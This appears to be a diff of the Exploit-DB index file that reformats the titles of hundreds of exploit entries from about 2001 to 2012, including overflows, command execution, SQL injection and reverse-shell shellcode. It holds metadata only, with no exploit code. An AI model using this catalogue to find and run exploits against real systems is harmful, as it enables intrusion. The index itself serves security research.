+21212,platforms/multiple/remote/21212.txt,"Cacheflow CacheOS 3.1/4.0 Web Administration - Arbitrary Cached Page Code Leakage",2002-01-08,"Bjorn Djupvik",multiple,remote,0 21213,platforms/multiple/dos/21213.txt,"Snort 1.8.3 ICMP Denial of Service",2002-01-10,Sinbad,multiple,dos,0 21214,platforms/windows/remote/21214.c,"SapporoWorks Black JumboDog 2.6.4/2.6.5 HTTP Proxy Buffer Overflow",2002-01-01,UNYUN,windows,remote,0 21215,platforms/unix/remote/21215.c,"FreeWnn 1.1 jserver JS_MKDIR Metacharacter Command Execution",2002-01-11,UNYUN,unix,remote,0 @@ -18524,18 +18524,18 @@ id,file,description,date,author,platform,type,port 21236,platforms/unix/dos/21236.txt,"DNRD 1.x/2.x - DNS Request/Reply Denial of Service",2002-01-20,"Andrew Griffiths",unix,dos,0 21237,platforms/windows/dos/21237.pl,"Cyberstop Web Server 0.1 Long Request DoS",2002-01-22,"Alex Hernandez",windows,dos,0 21238,platforms/osx/remote/21238.txt,"Apple MacOS Internet Explorer 3/4/5 - File Execution",2002-01-22,"Jass Seljamaa",osx,remote,0 -21239,platforms/unixware/local/21239.sh,"Caldera UnixWare 7.1.1 WebTop SCOAdminReg.CGI Arbitrary Command Execution",2002-01-20,jGgM,unixware,local,0 -21240,platforms/windows/dos/21240.txt,"Microsoft Windows XP .Manifest Denial of Service",2002-01-21,mosestycoon,windows,dos,0 +21239,platforms/unixware/local/21239.sh,"Caldera UnixWare 7.1.1 WebTop SCOAdminReg.CGI - Arbitrary Command Execution",2002-01-20,jGgM,unixware,local,0 +21240,platforms/windows/dos/21240.txt,"Microsoft Windows XP - .Manifest Denial of Service",2002-01-21,mosestycoon,windows,dos,0 21241,platforms/php/webapps/21241.txt,"WikkiTikkiTavi 0.x - Remote File Inclusion",2002-01-02,"Scott Moonen",php,webapps,0 21242,platforms/linux/remote/21242.c,"rsync 2.3/2.4/2.5 - Signed Array Index Remote Code Execution",2002-01-25,sorbo,linux,remote,0 21243,platforms/hardware/remote/21243.pl,"Alteon AceDirector Half-Closed HTTP Request IP Address Revealing Vulnerabililty",2001-12-20,"Dave Plonka",hardware,remote,0 21244,platforms/unix/local/21244.pl,"Tarantella Enterprise 3 gunzip Race Condition",2002-02-08,"Larry Cashdollar",unix,local,0 21245,platforms/windows/dos/21245.c,"Microsoft Windows 2000/NT 4 TCP Stack DoS (1)",2001-04-13,3APA3A,windows,dos,0 21246,platforms/windows/dos/21246.c,"Microsoft Windows 2000/NT 4 TCP Stack DoS (2)",2001-04-13,3APA3A,windows,dos,0 -21247,platforms/linux/local/21247.c,"BRU 17.0 SetLicense Script Insecure Temporary File Symbolic Link",2002-01-26,"Andrew Griffiths",linux,local,0 +21247,platforms/linux/local/21247.c,"BRU 17.0 - SetLicense Script Insecure Temporary File Symbolic Link",2002-01-26,"Andrew Griffiths",linux,local,0 21248,platforms/linux/local/21248.txt,"User-Mode Linux Kernel 2.4.17-8 - Memory Access Local Root",2000-08-25,"Andrew Griffiths",linux,local,0 -21249,platforms/cgi/remote/21249.txt,"Agora.CGI 3/4 Debug Mode Path Disclosure",2002-01-28,superpetz,cgi,remote,0 -21250,platforms/php/webapps/21250.txt,"Webify Blog Arbitrary File Deletion",2012-09-11,JIKO,php,webapps,0 +21249,platforms/cgi/remote/21249.txt,"Agora.CGI 3/4 - Debug Mode Path Disclosure",2002-01-28,superpetz,cgi,remote,0 +21250,platforms/php/webapps/21250.txt,"Webify Blog - Arbitrary File Deletion",2012-09-11,JIKO,php,webapps,0 21251,platforms/php/webapps/21251.txt,"akcms 4.2.4 - Information Disclosure",2012-09-11,L0n3ly-H34rT,php,webapps,0 21252,platforms/arm/shellcode/21252.asm,"Linux/ARM (Raspberry Pi) - reverse_shell (tcp_10.1.1.2_0x1337) shellcode (72 bytes)",2012-09-11,midnitesnake,arm,shellcode,0 21253,platforms/arm/shellcode/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) shellcode (30 bytes)",2012-09-11,midnitesnake,arm,shellcode,0 @@ -18552,9 +18552,9 @@ id,file,description,date,author,platform,type,port 21266,platforms/php/remote/21266.php,"PHP 4.x/5.x MySQL Library - 'Safe_Mode' Filesystem Circumvention (3)",2002-02-03,anonymous,php,remote,0 21267,platforms/php/webapps/21267.txt,"Subrion CMS 2.2.1 - CSRF Add Admin Exploit",2012-09-12,LiquidWorm,php,webapps,0 21268,platforms/hardware/remote/21268.py,"Sitecom MD-25x - Multiple Vulnerabilitie/ Reverse Root Shell Exploit",2012-09-12,"Mattijs van Ommeren",hardware,remote,0 -21269,platforms/php/webapps/21269.txt,"Webify eDownloads Cart Arbitrary File Deletion",2012-09-12,JIKO,php,webapps,0 -21270,platforms/php/webapps/21270.txt,"Webify Business Directory Arbitrary File Deletion",2012-09-12,JIKO,php,webapps,0 -21271,platforms/php/webapps/21271.txt,"Webify Photo Gallery Arbitrary File Deletion",2012-09-12,JIKO,php,webapps,0 +21269,platforms/php/webapps/21269.txt,"Webify eDownloads Cart - Arbitrary File Deletion",2012-09-12,JIKO,php,webapps,0 +21270,platforms/php/webapps/21270.txt,"Webify Business Directory - Arbitrary File Deletion",2012-09-12,JIKO,php,webapps,0 +21271,platforms/php/webapps/21271.txt,"Webify Photo Gallery - Arbitrary File Deletion",2012-09-12,JIKO,php,webapps,0 21272,platforms/asp/webapps/21272.txt,"Knowledge Base Enterprise Edition 4.62.00 - SQL Injection",2012-09-12,Vulnerability-Lab,asp,webapps,0 21273,platforms/php/webapps/21273.txt,"Ezylog Photovoltaic Management Server - Multiple Vulnerabilities",2012-09-12,"Roberto Paleari",php,webapps,0 21274,platforms/windows/remote/21274.c,"MIRC 2.x/3.x/4.x/5.x - Nick Buffer Overflow",2002-02-03,"James Martin",windows,remote,0 @@ -18617,7 +18617,7 @@ id,file,description,date,author,platform,type,port 21337,platforms/multiple/dos/21337.c,"Menasoft SPHEREserver 0.99 - Denial of Service",2002-03-09,"H Zero Seven",multiple,dos,0 21338,platforms/linux/dos/21338.pl,"XTux Server 2001.0 6.01 Garbage Denial of Service",2002-03-09,b0iler,linux,dos,0 21339,platforms/multiple/remote/21339.c,"Trend Micro InterScan VirusWall 3.5/3.6 Content-Length Scan Bypass",2002-03-11,"Jochen Thomas Bauer",multiple,remote,0 -21340,platforms/cgi/remote/21340.pl,"Solaris 7.0/8 Sunsolve CD SSCD_SunCourier.pl CGI Script Arbitrary Command Execution",2002-03-11,Fyodor,cgi,remote,0 +21340,platforms/cgi/remote/21340.pl,"Solaris 7.0/8 Sunsolve CD - SSCD_SunCourier.pl CGI Script Arbitrary Command Execution",2002-03-11,Fyodor,cgi,remote,0 21341,platforms/linux/local/21341.c,"Ecartis 1.0.0_0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (1)",2002-02-27,"the itch",linux,local,0 21342,platforms/linux/local/21342.c,"Ecartis 1.0.0_0.129 a Listar - Multiple Local Buffer Overflow Vulnerabilities (2)",2002-02-27,"the itch",linux,local,0 21343,platforms/php/webapps/21343.txt,"PHProjekt 3.1 - Remote File Inclusion",2002-03-13,b0iler,php,webapps,0 @@ -18625,7 +18625,7 @@ id,file,description,date,author,platform,type,port 21345,platforms/unix/dos/21345.txt,"Qualcomm QPopper 4.0.x - Remote Denial of Service",2002-03-15,"Jonas Frey",unix,dos,0 21346,platforms/windows/dos/21346.html,"Microsoft Internet Explorer 5/6_Mozilla 0.8/0.9.x_Opera 5/6 JavaScript Interpreter Denial of Service",2002-03-19,"Patrik Birgersson",windows,dos,0 21347,platforms/php/local/21347.php,"PHP 3.0.x/4.x - Move_Uploaded_File Open_Basedir Circumvention",2002-03-17,Tozz,php,local,0 -21348,platforms/linux/local/21348.txt,"Webmin 0.x - Script Code Input Validation",2002-03-20,prophecy,linux,local,0 +21348,platforms/linux/local/21348.txt,"Webmin 0.x - Code Input Validation",2002-03-20,prophecy,linux,local,0 21349,platforms/php/webapps/21349.txt,"PHP-Nuke 5.x - Error Message Web Root Disclosure",2002-03-21,godminus,php,webapps,0 21350,platforms/windows/remote/21350.pl,"Apache Win32 1.3.x/2.0.x - Batch File Remote Command Execution",2002-03-21,SPAX,windows,remote,0 21351,platforms/windows/local/21351.pl,"WorkforceROI Xpede 4.1/7.0 Weak Password Encryption",2002-03-22,c3rb3r,windows,local,0 @@ -18634,7 +18634,7 @@ id,file,description,date,author,platform,type,port 21354,platforms/cgi/remote/21354.txt,"CSSearch 2.3 - Remote Command Execution",2002-03-26,"Steve Gustin",cgi,remote,0 21355,platforms/jsp/remote/21355.txt,"Citrix NFuse 1.51/1.6 - Cross-Site Scripting",2002-03-27,"Eric Detoisien",jsp,remote,0 21356,platforms/linux/local/21356.sh,"LogWatch 2.1.1/2.5 - Insecure Temporary Directory Creation",2002-03-27,spybreak,linux,local,0 -21357,platforms/php/webapps/21357.txt,"PostNuke 0.703 caselist Arbitrary Module Include",2002-03-28,"pokleyzz sakamaniaka",php,webapps,0 +21357,platforms/php/webapps/21357.txt,"PostNuke 0.703 caselist - Arbitrary Module Include",2002-03-28,"pokleyzz sakamaniaka",php,webapps,0 21358,platforms/php/webapps/21358.sh,"SquirrelMail 1.2.x - Theme Remote Command Execution",2002-03-28,"pokleyzz sakamaniaka",php,webapps,0 21359,platforms/multiple/local/21359.c,"Progress 9.1 - sqlcpp Local Buffer Overflow",2002-03-22,kf,multiple,local,0 21360,platforms/solaris/local/21360.c,"Sun Solaris 2.6/7.0/8 XSun Color Database File Heap Overflow",2002-04-02,gloomy,solaris,local,0 @@ -18643,7 +18643,7 @@ id,file,description,date,author,platform,type,port 21363,platforms/unix/remote/21363.c,"Icecast 1.x - AVLLib Buffer Overflow",2002-02-16,dizznutt,unix,remote,0 21364,platforms/netbsd_x86/remote/21364.txt,"NetBSD 1.x TalkD - User Validation",2002-04-03,"Tekno pHReak",netbsd_x86,remote,0 21365,platforms/linux/remote/21365.txt,"PHPGroupWare 0.9.13 Debian Package Configuration",2002-04-03,"Matthias Jordan",linux,remote,0 -21366,platforms/windows/dos/21366.txt,"Microsoft Internet Explorer 5/6_Outlook 2000/2002/5.5_Word 2000/2002 VBScript ActiveX Word Object DoS",2002-04-08,"Elia Florio",windows,dos,0 +21366,platforms/windows/dos/21366.txt,"Microsoft Internet Explorer 5/6_Outlook 2000/2002/5.5_Word 2000/2002 VBScript - ActiveX Word Object DoS",2002-04-08,"Elia Florio",windows,dos,0 21367,platforms/windows/remote/21367.txt,"Abyss Web Server 1.0 - File Disclosure",2002-04-07,"Jeremy Roberts",windows,remote,0 21368,platforms/windows/remote/21368.c,"Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow (1)",2002-04-10,"CHINANSL Security Team",windows,remote,0 21369,platforms/windows/remote/21369.c,"Microsoft IIS 4.0/5.0 Chunked Encoding Transfer Heap Overflow (2)",2002-04-14,hsj,windows,remote,0 @@ -18654,7 +18654,7 @@ id,file,description,date,author,platform,type,port 21373,platforms/openbsd/local/21373.c,"OpenBSD 2.9/3.0 - Default Crontab Root Compromise",2002-04-11,"Przemyslaw Frasunek",openbsd,local,0 21374,platforms/cgi/webapps/21374.txt,"IBM Informix Web Datablade 4.1x Page Request SQL Injection",2002-04-11,"Simon Lodal",cgi,webapps,0 21375,platforms/linux/local/21375.txt,"ISC INN 2.0/2.1/2.2.x - Multiple Local Format String Vulnerabilties",2002-04-11,"Paul Starzetz",linux,local,0 -21376,platforms/windows/remote/21376.html,"Microsoft Internet Explorer 5.5/6.0 History List Script Injection",2002-04-15,"Andreas Sandblad",windows,remote,0 +21376,platforms/windows/remote/21376.html,"Microsoft Internet Explorer 5.5/6.0 - History List Script Injection",2002-04-15,"Andreas Sandblad",windows,remote,0 21377,platforms/php/webapps/21377.txt,"SunShop Shopping Cart 1.5/2.x - User-Embedded Scripting",2002-04-13,ppp-design,php,webapps,0 21378,platforms/hardware/remote/21378.txt,"Nortel CVX 1800 Multi-Service Access Switch Default SNMP Community",2002-04-15,"Michael Rawls",hardware,remote,0 21379,platforms/multiple/dos/21379.pl,"Melange Chat System 2.0.2 Beta 2 - /yell Remote Buffer Overflow",2002-04-14,DVDMAN,multiple,dos,0 @@ -18668,7 +18668,7 @@ id,file,description,date,author,platform,type,port 21387,platforms/windows/dos/21387.txt,"WebTrends Reporting Center for Windows 4.0 d GET Request Buffer Overflow",2002-04-17,"Mark Litchfield",windows,dos,0 21388,platforms/windows/dos/21388.c,"Microsoft Windows 2000 Lanman Denial of Service (1)",2002-04-17,"Daniel Nystrom",windows,dos,0 21389,platforms/windows/dos/21389.txt,"Microsoft Windows 2000 Lanman Denial of Service (2)",2003-01-03,ch0wn,windows,dos,0 -21390,platforms/cgi/remote/21390.txt,"Sambar Server 5.1 Script Source Disclosure",2002-04-17,pgrundl,cgi,remote,0 +21390,platforms/cgi/remote/21390.txt,"Sambar Server 5.1 - Script Source Disclosure",2002-04-17,pgrundl,cgi,remote,0 21391,platforms/php/webapps/21391.txt,"PVote 1.0/1.5 Poll Content Manipulation",2002-04-18,"Daniel Nyström",php,webapps,0 21392,platforms/windows/webapps/21392.txt,"Spiceworks 6.0.00993 - Multiple Script Injection Vulnerabilities",2012-09-19,LiquidWorm,windows,webapps,0 21393,platforms/php/webapps/21393.txt,"WordPress Plugin wp-topbar 4.02 - Multiple Vulnerabilities",2012-09-19,"Blake Entrekin",php,webapps,0 @@ -18677,14 +18677,14 @@ id,file,description,date,author,platform,type,port 21396,platforms/php/webapps/21396.txt,"torrenttrader 2.08 - Multiple Vulnerabilities",2012-09-19,waraxe,php,webapps,0 21397,platforms/php/webapps/21397.txt,"PVote 1.0/1.5 - Unauthorized Administrative Password Change",2002-04-18,"Daniel Nyström",php,webapps,0 21398,platforms/linux/local/21398.txt,"SSH2 3.0 Restricted Shell Escaping Command Execution",2002-04-18,A.Dimitrov,linux,local,0 -21399,platforms/php/webapps/21399.txt,"IcrediBB 1.1 Script Injection",2002-04-19,"Daniel Nyström",php,webapps,0 +21399,platforms/php/webapps/21399.txt,"IcrediBB 1.1 - Script Injection",2002-04-19,"Daniel Nyström",php,webapps,0 21400,platforms/asp/webapps/21400.txt,"Snitz Forums 2000 3.x - Members.ASP SQL Injection",2002-04-19,acemi,asp,webapps,0 -21401,platforms/php/webapps/21401.txt,"PostBoard 2.0 BBCode IMG Tag Script Injection",2002-04-19,gcsb,php,webapps,0 +21401,platforms/php/webapps/21401.txt,"PostBoard 2.0 - BBCode IMG Tag Script Injection",2002-04-19,gcsb,php,webapps,0 21402,platforms/linux/remote/21402.txt,"OpenSSH 2.x/3.x - Kerberos 4 TGT/AFS Token Buffer Overflow",2002-04-19,"Marcell Fodor",linux,remote,0 -21403,platforms/php/webapps/21403.txt,"PostBoard 2.0 Topic Title Script Execution",2002-04-19,gcsb,php,webapps,0 +21403,platforms/php/webapps/21403.txt,"PostBoard 2.0 - Topic Title Script Execution",2002-04-19,gcsb,php,webapps,0 21404,platforms/windows/dos/21404.htm,"Microsoft Internet Explorer 5/6 Self-Referential Object Denial of Service",2002-04-20,"Matthew Murphy",windows,dos,0 21405,platforms/cgi/webapps/21405.txt,"Jon Howell Faq-O-Matic 2.7 - Cross-Site Scripting",2002-04-20,BrainRawt,cgi,webapps,0 -21406,platforms/cgi/webapps/21406.txt,"Philip Chinery's Guestbook 1.1 Script Injection",2002-04-21,"markus arndt",cgi,webapps,0 +21406,platforms/cgi/webapps/21406.txt,"Philip Chinery's Guestbook 1.1 - Script Injection",2002-04-21,"markus arndt",cgi,webapps,0 21407,platforms/bsd/local/21407.c,"OS X 10.x_ FreeBSD 4.x_ OpenBSD 2.x_ Solaris 2.5/2.6/7.0/8 - exec C Library Standard I/O File Descriptor Closure",2002-04-23,phased,bsd,local,0 21408,platforms/unix/local/21408.pl,"SLRNPull 0.9.6 Spool Directory Command Line Parameter Buffer Overflow",2002-04-22,zillion,unix,local,0 21409,platforms/unix/dos/21409.pl,"PsyBNC 2.3 Oversized Passwords Denial of Service",2002-04-22,DVDMAN,unix,dos,0 @@ -18700,17 +18700,17 @@ id,file,description,date,author,platform,type,port 21420,platforms/linux/local/21420.c,"Sudo 1.6.x - Password Prompt Heap Overflow",2001-11-01,MaXX,linux,local,0 21421,platforms/php/webapps/21421.txt,"PHProjekt 2.x/3.x - Login Bypass",2002-04-25,"Ulf Harnhammar",php,webapps,0 21422,platforms/linux/remote/21422.txt,"ACME Labs thttpd 2.20 - Cross-Site Scripting",2002-04-25,frog,linux,remote,0 -21423,platforms/php/webapps/21423.txt,"Ultimate PHP Board 1.0/1.1 Image Tag Script Injection",2002-04-25,frog,php,webapps,0 +21423,platforms/php/webapps/21423.txt,"Ultimate PHP Board 1.0/1.1 - Image Tag Script Injection",2002-04-25,frog,php,webapps,0 21424,platforms/php/webapps/21424.txt,"Admanager 1.1 - Content Manipulation",2002-04-17,frog,php,webapps,0 21425,platforms/php/webapps/21425.txt,"DNSTools 2.0 - Authentication Bypass",2002-04-28,ppp-design,php,webapps,0 -21426,platforms/php/webapps/21426.txt,"Blahz-DNS 0.2 Direct Script Call Authentication Bypass",2002-04-28,ppp-design,php,webapps,0 +21426,platforms/php/webapps/21426.txt,"Blahz-DNS 0.2 - Direct Script Call Authentication Bypass",2002-04-28,ppp-design,php,webapps,0 21427,platforms/php/webapps/21427.txt,"MiniBB 1.2 - Cross-Site Scripting",2002-04-17,frog,php,webapps,0 21428,platforms/php/dos/21428.txt,"Messagerie 1.0 - Arbitrary User Removal DoS",2002-04-27,frog,php,dos,0 21429,platforms/windows/dos/21429.c,"3CDaemon 2.0 - Buffer Overflow (1)",2002-04-15,"MaD SKiLL",windows,dos,0 22216,platforms/php/webapps/22216.txt,"bitweaver 2.8.1 - Multiple Vulnerabilities",2012-10-24,"Trustwave's SpiderLabs",php,webapps,0 21431,platforms/irix/dos/21431.txt,"IRIX 6.5.x - Performance Co-Pilot Remote Denial of Service",2002-04-12,"Marcelo Magnasco",irix,dos,0 21432,platforms/windows/dos/21432.txt,"BEA Systems WebLogic Server and Express 7.0 - Null Character DoS",2002-04-30,"Peter Gründl",windows,dos,0 -21433,platforms/cgi/webapps/21433.txt,"MyGuestbook 1.0 Script Injection",2002-04-30,BrainRawt,cgi,webapps,0 +21433,platforms/cgi/webapps/21433.txt,"MyGuestbook 1.0 - Script Injection",2002-04-30,BrainRawt,cgi,webapps,0 21434,platforms/asp/webapps/21434.txt,"Outfront Spooky 2.x - Login SQL Query Manipulation Password",2002-05-02,anonymous,asp,webapps,0 21435,platforms/cgi/webapps/21435.txt,"askSam 4.0 Web Publisher Cross-Site Scripting",2002-05-05,frog,cgi,webapps,0 21436,platforms/php/webapps/21436.txt,"B2 0.6 b2edit.showposts.php b2inc Parameter Remote File Inclusion",2002-05-06,Frank,php,webapps,0 @@ -18730,7 +18730,7 @@ id,file,description,date,author,platform,type,port 21450,platforms/multiple/remote/21450.txt,"id Software Quake II Server 3.20/3.21 - Remote Information Disclosure",2002-05-15,Redix,multiple,remote,0 21451,platforms/windows/remote/21451.txt,"Opera 5.12/6.0 Frame Location Same Origin Policy Circumvention",2002-05-15,"Andreas Sandblad",windows,remote,0 21452,platforms/windows/remote/21452.txt,"Microsoft Internet Explorer 5.0.1/6.0 Content-Disposition Handling File Execution",2002-05-15,"Jani Laatikainen",windows,remote,0 -21453,platforms/multiple/remote/21453.txt,"SonicWall SOHO3 6.3 Content Blocking Script Injection",2002-05-17,"E M",multiple,remote,0 +21453,platforms/multiple/remote/21453.txt,"SonicWall SOHO3 6.3 - Content Blocking Script Injection",2002-05-17,"E M",multiple,remote,0 21454,platforms/php/webapps/21454.txt,"Clicky Web Pseudo-frames 1.0 - Remote File Inclusion",2002-05-12,frog,php,webapps,0 21455,platforms/asp/webapps/21455.txt,"Hosting Controller 1.x - DSNManager Directory Traversal",2002-05-17,hdlkha,asp,webapps,0 21456,platforms/hardware/remote/21456.txt,"Cisco IDS Device Manager 3.1.1 - Arbitrary File Read Access",2002-05-17,"Andrew Lopacki",hardware,remote,0 @@ -18778,8 +18778,8 @@ id,file,description,date,author,platform,type,port 21498,platforms/windows/dos/21498.c,"Evolvable Shambala Server 4.5 Web Server Denial of Service",2002-05-31,Shambala,windows,dos,0 21650,platforms/windows/remote/21650.txt,"Microsoft SQL Server 2000 Database Consistency Checkers Buffer Overflow",2002-07-25,"Cesar Cerrudo",windows,remote,0 21499,platforms/linux/local/21499.txt,"QNX RTOS 4.25 CRTTrap File Disclosure",2002-05-31,"Simon Ouellette",linux,local,0 -21500,platforms/linux/local/21500.txt,"QNX RTOS 4.25 monitor Arbitrary File Modification",2002-05-31,"Simon Ouellette",linux,local,0 -21501,platforms/linux/local/21501.txt,"QNX RTOS 4.25 dumper Arbitrary File Modification",2002-05-31,"Simon Ouellette",linux,local,0 +21500,platforms/linux/local/21500.txt,"QNX RTOS 4.25 monitor - Arbitrary File Modification",2002-05-31,"Simon Ouellette",linux,local,0 +21501,platforms/linux/local/21501.txt,"QNX RTOS 4.25 dumper - Arbitrary File Modification",2002-05-31,"Simon Ouellette",linux,local,0 21502,platforms/linux/local/21502.txt,"QNX RTOS 4.25/6.1 su Password Hash Disclosure",2002-06-03,badc0ded,linux,local,0 21503,platforms/linux/local/21503.sh,"QNX RTOS 4.25/6.1 - phgrafxPrivilege Escalation",2002-06-03,badc0ded,linux,local,0 21504,platforms/linux/local/21504.sh,"QNX RTOS 4.25/6.1 - phgrafx-startup Privilege Escalation",2002-06-03,badc0ded,linux,local,0 @@ -18804,7 +18804,7 @@ id,file,description,date,author,platform,type,port 21525,platforms/php/webapps/21525.txt,"Geeklog 1.3.5 - Multiple Cross-Site Scripting Vulnerabilities",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 21526,platforms/php/webapps/21526.txt,"MyHelpDesk 20020509 - Cross-Site Scripting",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 21527,platforms/php/webapps/21527.txt,"MyHelpDesk 20020509 - SQL Injection",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 -21528,platforms/php/webapps/21528.txt,"Geeklog 1.3.5 Calendar Event Form Script Injection",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 +21528,platforms/php/webapps/21528.txt,"Geeklog 1.3.5 - Calendar Event Form Script Injection",2002-06-10,"Ahmet Sabri ALPER",php,webapps,0 21529,platforms/php/webapps/21529.txt,"W-Agora 4.1.x - Remote File Inclusion",2002-06-10,frog,php,webapps,0 21530,platforms/windows/remote/21530.txt,"Seanox DevWex Windows Binary 1.2002.520 - File Disclosure",2002-06-08,"Kistler Ueli",windows,remote,0 21531,platforms/unix/dos/21531.txt,"Caldera OpenServer 5.0.x - XSCO Color Database File Heap Overflow",2002-06-11,kf,unix,dos,0 @@ -18833,7 +18833,7 @@ id,file,description,date,author,platform,type,port 21554,platforms/windows/remote/21554.txt,"Imatix Xitami 2.5 GSL Template Cross-Site Scripting",2002-06-14,"Matthew Murphy",windows,remote,0 21555,platforms/windows/remote/21555.txt,"Cisco Secure ACS for Windows NT 3.0 - Cross-Site Scripting",2002-06-14,"Dave Palumbo",windows,remote,0 21556,platforms/windows/dos/21556.txt,"Microsoft Internet Explorer 5/6 CSSText Bold Font Denial of Service",2002-06-15,"Oleg A. Cheremisin",windows,dos,0 -21557,platforms/php/webapps/21557.txt,"Zeroboard 4.1 PHP Include File Arbitrary Command Execution",2002-06-15,onlooker,php,webapps,0 +21557,platforms/php/webapps/21557.txt,"Zeroboard 4.1 PHP Include File - Arbitrary Command Execution",2002-06-15,onlooker,php,webapps,0 21558,platforms/cgi/webapps/21558.txt,"My Postcards 6.0 - MagicCard.CGI Arbitrary File Disclosure",2002-06-15,cult,cgi,webapps,0 21559,platforms/multiple/remote/21559.c,"Apache 1.x/2.0.x - Chunked-Encoding Memory Corruption (1)",2002-06-17,"Gobbles Security",multiple,remote,0 21560,platforms/multiple/remote/21560.c,"Apache 1.x/2.0.x - Chunked-Encoding Memory Corruption (2)",2002-06-17,"Gobbles Security",multiple,remote,0 @@ -18846,7 +18846,7 @@ id,file,description,date,author,platform,type,port 21567,platforms/cgi/webapps/21567.pl,"WebScripts WebBBS 4.x/5.0 - Remote Command Execution",2002-06-06,"NERF Security",cgi,webapps,0 21568,platforms/linux/local/21568.c,"Cisco VPN Client for Unix 3.5.1 - Local Buffer Overflow",2002-06-19,methodic,linux,local,0 21569,platforms/windows/dos/21569.txt,"Microsoft SQL Server 2000_Microsoft Jet 4.0 Engine Unicode Buffer Overflow",2002-06-19,NGSSoftware,windows,dos,0 -21570,platforms/php/webapps/21570.txt,"BasiliX Webmail 1.1 Message Content Script Injection",2002-06-19,"Ulf Harnhammar",php,webapps,0 +21570,platforms/php/webapps/21570.txt,"BasiliX Webmail 1.1 - Message Content Script Injection",2002-06-19,"Ulf Harnhammar",php,webapps,0 21571,platforms/irix/remote/21571.c,"SGI IRIX 6.x - rpc.xfsmd Remote Command Execution",2002-06-20,"Last Stage of Delirium",irix,remote,0 21572,platforms/multiple/dos/21572.txt,"Half-Life Server 1.1/3.1 New Player Flood Denial of Service",2002-06-20,"Auriemma Luigi",multiple,dos,0 21573,platforms/cgi/webapps/21573.txt,"YaBB 1 - Invalid Topic Error Page Cross-Site Scripting",2002-06-21,methodic,cgi,webapps,0 @@ -18862,10 +18862,10 @@ id,file,description,date,author,platform,type,port 21583,platforms/linux/local/21583.pl,"Mandrake 7/8/9_RedHat 6.x/7 Bonobo EFSTool Commandline Argument Buffer Overflow (1)",2002-06-29,clorox,linux,local,0 21584,platforms/linux/local/21584.pl,"Mandrake 7/8/9_RedHat 6.x/7 Bonobo EFSTool Commandline Argument Buffer Overflow (2)",2002-06-29,"andrea lisci",linux,local,0 21585,platforms/linux/local/21585.c,"Mandrake 7/8/9_RedHat 6.x/7 Bonobo EFSTool Commandline Argument Buffer Overflow (3)",2002-06-29,N4rK07IX,linux,local,0 -21586,platforms/linux/remote/21586.txt,"E-Guest 1.1 Server Side Include Arbitrary Command Execution",2002-06-30,DownBload,linux,remote,0 +21586,platforms/linux/remote/21586.txt,"E-Guest 1.1 Server Side Include - Arbitrary Command Execution",2002-06-30,DownBload,linux,remote,0 21587,platforms/cgi/webapps/21587.txt,"BBC Education Betsie 1.5 Parserl.PL Cross-Site Scripting",2002-07-01,"Mark Rowe",cgi,webapps,0 21588,platforms/cgi/webapps/21588.txt,"Blackboard 5.0 - Cross-Site Scripting",2002-07-01,"Berend-Jan Wever",cgi,webapps,0 -21589,platforms/windows/remote/21589.pl,"AnalogX Proxy 4.0 Socks4A Buffer Overflow",2002-07-01,Kanatoko,windows,remote,0 +21589,platforms/windows/remote/21589.pl,"AnalogX Proxy 4.0 - Socks4A Buffer Overflow",2002-07-01,Kanatoko,windows,remote,0 21590,platforms/php/webapps/21590.txt,"PHPAuction 1/2 - Unauthorized Administrative Access",2002-07-02,ethx,php,webapps,0 21591,platforms/windows/remote/21591.sh,"ArGoSoft 1.8 Mail Server Directory Traversal",2002-07-06,"team n.finity",windows,remote,0 21592,platforms/unix/local/21592.c,"Sun SunPCi II VNC Software 2.3 Password Disclosure",2002-07-03,"Richard van den Berg",unix,local,0 @@ -18915,7 +18915,7 @@ id,file,description,date,author,platform,type,port 21635,platforms/windows/remote/21635.c,"SecureCRT 2.4/3.x/4.0 SSH1 Identifier String Buffer Overflow (2)",2002-07-23,"andrea lisci",windows,remote,0 21636,platforms/windows/remote/21636.txt,"Opera 6.0.1_Microsoft Internet Explorer 5/6 - JavaScript Modifier Keypress Event Subversion",2002-07-23,"Andreas Sandblad",windows,remote,0 21637,platforms/hardware/dos/21637.c,"ZyXEL Prestige 642R Router - Malformed IP Packet Denial of Service",2002-07-24,"Jeff w. Roberson",hardware,dos,0 -21638,platforms/multiple/remote/21638.txt,"Mozilla 0.9.x/1.0 JavaScript URL Host Spoofing Arbitrary Cookie Access",2002-07-24,"Andreas Sandblad",multiple,remote,0 +21638,platforms/multiple/remote/21638.txt,"Mozilla 0.9.x/1.0 JavaScript URL Host Spoofing - Arbitrary Cookie Access",2002-07-24,"Andreas Sandblad",multiple,remote,0 21639,platforms/windows/remote/21639.c,"VMware GSX Server 2.0 - Authentication Server Buffer Overflow",2002-07-24,"Zag & Glcs",windows,remote,0 21640,platforms/php/webapps/21640.txt,"Cobalt Qube 3.0 - Authentication Bypass",2002-07-24,pokley,php,webapps,0 21641,platforms/cgi/remote/21641.txt,"GNU Mailman 2.0.x - Subscribe Cross-Site Scripting",2002-07-24,office,cgi,remote,0 @@ -18937,7 +18937,7 @@ id,file,description,date,author,platform,type,port 21659,platforms/cgi/webapps/21659.html,"Ben Chivers Easy Guestbook 1.0 - Administrative Access",2002-07-29,"Arek Suroboyo",cgi,webapps,0 21660,platforms/php/webapps/21660.txt,"phpBB2 Gender Mod 1.1.3 - SQL Injection",2002-07-29,"langtuhaohoa caothuvolam",php,webapps,0 21661,platforms/php/webapps/21661.txt,"DotProject 0.2.1 - User Cookie Authentication Bypass",2002-07-29,pokleyzz,php,webapps,0 -21662,platforms/windows/remote/21662.txt,"Microsoft Outlook Express 6 XML File Attachment Script Execution",2002-07-29,http-equiv,windows,remote,0 +21662,platforms/windows/remote/21662.txt,"Microsoft Outlook Express 6 - XML File Attachment Script Execution",2002-07-29,http-equiv,windows,remote,0 21663,platforms/linux/remote/21663.c,"Fake Identd 0.9/1.x - Client Query Remote Buffer Overflow",2002-07-25,Jedi/Sector,linux,remote,0 21665,platforms/php/webapps/21665.txt,"phptax 0.8 - Remote Code Execution",2012-10-02,"Jean Pascal Pereira",php,webapps,0 21666,platforms/linux/local/21666.txt,"soapbox 0.3.1 - Local Root Exploit",2012-10-02,"Jean Pascal Pereira",linux,local,0 @@ -19004,13 +19004,13 @@ 